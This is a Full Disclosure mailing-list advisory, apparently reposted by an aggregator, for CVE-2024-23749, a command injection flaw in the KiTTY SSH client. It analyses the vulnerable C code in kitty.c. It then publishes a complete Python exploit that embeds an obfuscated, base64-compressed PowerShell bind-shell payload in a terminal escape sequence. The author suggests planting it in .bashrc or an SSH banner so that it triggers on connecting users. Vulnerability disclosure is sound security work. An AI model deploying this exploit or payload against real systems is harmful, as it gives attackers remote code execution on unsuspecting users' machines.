Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749)
2024-2-14 10:16:29 Author: seclists.org(查看原文) 阅读量:21 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Austin DeFrancesco via Fulldisclosure <fulldisclosure () seclists org>
Date: Wed, 07 Feb 2024 18:00:10 +0000

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749)
===========================================================================================

Contents:
---------

Summary

Analysis

Exploitation

Acknowledgments

Timeline

Additional Advisory

Summary:
--------

Austin A. DeFrancesco (DEFCESCO) discovered a command injection vulnerability in KiTTY 
(https://github.com/cyd01/KiTTY/). This vulnerability:

-   Is exploitable by any KiTTY user connecting to a host with the embedded exploit;
-   The vulnerability was introduced in the original release in May 2021 (commit 4f79b1e) and affects all versions up 
to KiTTY ≤ 0.76.1.13 in their default configuration.

Austin developed an exploit for this vulnerability and obtained remote code execution in the context of the user 
running the application; by default, KiTTY can be operated in the user permission group of Standard Users. This exploit 
is stable and repeatable on all Microsoft Windows operating systems 11/10/8/7/XP.

Analysis:
---------

CVE-2024-23749 command injection vulnerability is in `kitty.c` precisely the `GetOneFile` function. The vulnerable 
lines of code are on lines `2369-2386`; in the latest revision `75fa2abcd220c172` 
(https://github.com/cyd01/KiTTY/blob/75fa2abcd220c17249ff7252f8d5224137001f2d/kitty.c#L2369C4-L2391C2).

If KiTTY encounters the ANSI escape sequence `\\033]0;__rv` in a stream, it interprets it as an instruction to transfer 
files using Putty Secure Copy Protocol (PSCP):

-   `\\033`: This is the escape character (octal representation of ASCII ESC), which signals the beginning of an escape 
sequence.
-   `]0;`: This sequence part indicates a metacommand will be defined.
-   `__rv`: This is the vulnerable KiTTY command to transfer files using PSCP, which takes the input of a filename or 
file path.
-   `\\077`: This is the terminator sequence to indicate the end of the escape sequence.
-   KiTTY’s `kitty.c` `__rv` command runs through specific handling based on the input parameters and configurations.

After the series of specific handling requests for other input parameters and configurations (at lines 2277-2368), 
KiTTY checks if the `filename` is larger than zero and checks if the `filename` is a directory or a single filename (at 
lines 2372). After these parameter and configuration checks, the filename is concatenated to the `buffer` (at line 
2377). Finally, the constructed buffer is executed using the `system( buffer )` (at line 2386).

CVE-2024-24749, where the `filename` variable is vulnerable to command injection, occurs due to insufficient input 
sanitization and validation, failure to escape special characters, and insecure system calls (at lines 2369-2390). This 
allows an attacker to add inputs inside the `filename` variable, leading to arbitrary code execution.

2369 if( filename[0]=='/' ) { 2370 strcat(buffer, filename ) ; 2371 } else { 2372 if( (directory!=NULL) && 
(strlen(directory)>0) && (strlen(filename)>0) ) { 2373 strcat( buffer, directory ) ; strcat( buffer, "/" ) ; strcat( 
buffer, filename ) ; 2374 } else if( (directory!=NULL) && (strlen(directory)>0) ) { 2375 strcat(buffer, directory ) ; 
strcat( buffer, "/*") ; 2376 } else { 2377 strcat(buffer, filename ) ; 2378 } 2379 } 2380 strcat( buffer, "\" \"" ) ; 
strcat( buffer, dir ) ; strcat( buffer, "\"" ) ; 2381 //strcat( buffer, " > kitty.log 2>&1" ) ; //if( !system( buffer ) 
) unlink( "kitty.log" ) ; 2382 2383 chdir( InitialDirectory ) ; 2384 2385 if( debug_flag ) { debug_logevent( "Get on 
file: %s", buffer) ; } 2386 if( system( buffer ) ) { MessageBox( NULL, buffer, "Transfer problem", MB_OK|MB_ICONERROR ) 
; } 2387 2388 //debug_log("%s\n",buffer);//MessageBox( NULL, buffer, "Info",MB_OK ); 2389 2390 
memset(buffer,0,strlen(buffer)); 2391 }

Exploitation:
-------------

### __rv Command Injection:

From an attacker’s point of view, the exploit CVE-2024-23749 can be inserted into the `.bashrc` file for all users or 
in the SSH warning/message of the day (MOTD) banner. The exploit will trigger once the user logs in or is presented 
with the SSH warning/MOTD banner.

KiTTY’s `__rv` function crashed (at line 2601) because adjacent memory was overwritten.

To reproduce the vulnerability, follow these steps:

1.  Start KiTTY and start an SSH session.
2.  Update the payload handler and payload documented in the exploit’s comments.
3.  Save the exploit on the connected SSH session.
4.  Execute the exploit using Python: `python3 CVE-2024-23749.py`.

    #!/usr/bin/python
    
    #----------------------------------------------------------------------------------------#
    # Exploit: KiTTY ≤ 0.76.1.13 Command Injection Vulnerability in KiTTY                    #
    #        Get Remote File Through SCP Input (CVE-2024-23749)                              #
    # OS: Microsoft Windows 11/10/8/7/XP                                                     #
    # Author: DEFCESCO (Austin A. DeFrancesco)                                               #
    # Software:                                                                              #
    # <https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip>    #
    #----------------------------------------------------------------------------------------#
    # More details can be found on my blog: <https://blog.DEFCESCO.io/Hell0+KiTTY>             #
    #----------------------------------------------------------------------------------------#
    # msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler                             #
    # [*] Payload Handler Started as Job 1                                                   #
    # msf6 payload(cmd/windows/powershell_bind_tcp) >                                        #
    # [*] Started bind TCP handler against 192.168.100.28:4444                               #
    # [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444) #
    #----------------------------------------------------------------------------------------#
    
    import os
    import sys
    
    #-----------------------------------------------------------------#
    # msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw #
    #-----------------------------------------------------------------#
    
    shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create'
    shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G'
    shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa'
    shellcode += b'se64String(((\\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey'
    shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\\'+\\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh'
    shellcode += b'kvUBgYPA3APsGG\\'+\\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4'
    shellcode += b'jBeXa\\'+\\'QgRGld\\'+\\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1'
    shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\\'+\\'AFWMm85{2}gI/hVGUK'
    shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\\'+\\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM'
    shellcode += b'8kWhDlXHr\\'+\\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB'
    shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f'
    shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0'
    shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\\'+'
    shellcode += b'\\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\\'+'
    shellcode += b'\\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\\'+\\'1Txf3SQJhG8E/BlNRyY'
    shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\\'+\\'T3Ztk3Tt{2}2'
    shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+'
    shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k'
    shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\\'+\\'IyoERfSimrYbXTGP{1}g1Jc'
    shellcode += b'7\\'+\\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL'
    shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve'
    shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\\')-f'
    shellcode += b'\\'=\\',\\'9\\',\\'O\\')))),[System.IO.Compression.CompressionMode]::Decompr'
    shellcode += b'ess))).ReadToEnd()))\\"'
    
    escape_sequence = b'\\033]0;__rv:'
    escape_sequence += b'" & '
    escape_sequence += shellcode
    escape_sequence += b' #\\007' 
    
    stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
    stdout.write(escape_sequence)
    stdout.flush()
    

Acknowledgments:
----------------

Austin thanks the MITRE CVE Assignment Team for their assistance with the CVE service requests.

Timeline:
---------

2024-01-08: This advisory contains one vulnerability and one additional advisory totaling three vulnerabilities sent to 
KiTTY maintainer Cyril Dupont; no reply from Cyril.

2024-01-28: Follow-up email with assigned CVE numbers and full writeups sent to Cyril Dupont; no reply.

2024-02-07: Public Advisory & Exploits Release Date (6:00 PM UCT).

Additional Advisory:
--------------------

Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) 
Variables: https://blog.defcesco.io/CVE-2024-25003-CVE-2024-25004
-----BEGIN PGP SIGNATURE-----
Version: ProtonMail

wnUEARYKACcFgmXDxSAJkLsLizjqexAlFiEETZ4dNJxyJAAtf1r5uwuLOOp7
ECUAAFkhAQD2y/dueupEMnNKAxNfh243Q25I+ofw2gxvT1cg6nkniQEAgH5A
7uuWKGMhwDEqQCrVtc2+yZ3h1hbdJI/8ZbCLhAc=
=j94V
-----END PGP SIGNATURE-----

Attachment: publickey - [email protected] - 0x4D9E1D34.asc
Description:

Attachment: publickey - [email protected] - 0x4D9E1D34.asc.sig
Description:

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749) Austin DeFrancesco via Fulldisclosure (Feb 13)

文章来源: https://seclists.org/fulldisclosure/2024/Feb/13
如有侵权请联系:admin#unsafe.sh